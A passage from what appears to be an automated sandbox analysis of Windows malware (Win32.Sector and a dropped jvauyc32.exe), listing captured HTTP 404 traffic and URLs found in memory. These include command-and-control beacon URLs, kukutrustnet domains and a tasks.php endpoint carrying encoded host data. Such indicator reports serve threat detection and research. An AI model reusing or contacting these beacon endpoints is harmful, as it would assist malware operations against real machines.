server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:47 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:45:33 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?18a856f=77566029
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?22aca7d=145435124
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?22aca7d=1454351240
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?22aca7d=145435124L
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?270a0145=-2040263502
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?270a0145=-2040263502_
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?27fe3552=-1611082424
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2945db31=1244584328
        Source: jvauyc32.exe, 0000000A.00000003.3587177959.000000000669A000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2b436842=725837890
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2b436842=7258378902
        Source: jvauyc32.exe, 0000000A.00000003.3587177959.000000000669A000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2be56550=-1225394912
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030=
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030M
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030V
        Source: jvauyc32.exe, 0000000A.00000003.3703628262.000000000669A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2e54b34b=777302859
        Source: jvauyc32.exe, 0000000A.00000003.3703628262.000000000669A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?308e5400=-443594752
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?3337cce9=1720097375
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434
        Source: jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=3903554340
        Source: jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434=
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434a
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?3ff2df5=201165279
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?542972c=882501560
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?74d2bd=76561250
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?74d2bd=76561250eg
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900A
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2524944921.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900K
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900M
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?eaa8c1=153786250
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.000000000094F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=166877501
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=166877507
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750W
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750Y
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750g
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750w
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gifK
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712636020.00000000013F9000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1706613049.0000000000A43000.00000004.10000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://89.11
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3703628262.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=padrup.com&pid=9PO755G95
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: jvauyc32.exe, 00000012.00000002.4037104835.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n.ddnsgratis.com.br/n/tasks.php1401076386715766
        Source: jvauyc32.exe, 00000012.00000002.4062598961.000000000313B000.00000004.00000010.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000002.4041990668.0000000001510000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000002.4037104835.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n.ddnsgratis.com.br/n/tasks.php9e146be9-c76a-4720-bcdb-53011b87bd06dGluYSA6IFRJTkEtUEMgOiA4Nz
        Source: jvauyc32.exe, 00000012.00000002.4035800801.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n.ddnsgratis.com.br/n/tasks.phphttp://n.ddnsgratis.com.br/n/tasks.php9e146be9-c76a-4720-bcdb-
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712636020.00000000013F9000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1706613049.0000000000A43000.00000004.10000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?115dbf54=-1381402296
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2524944921.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?115dbf54=-1381402296X
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116#
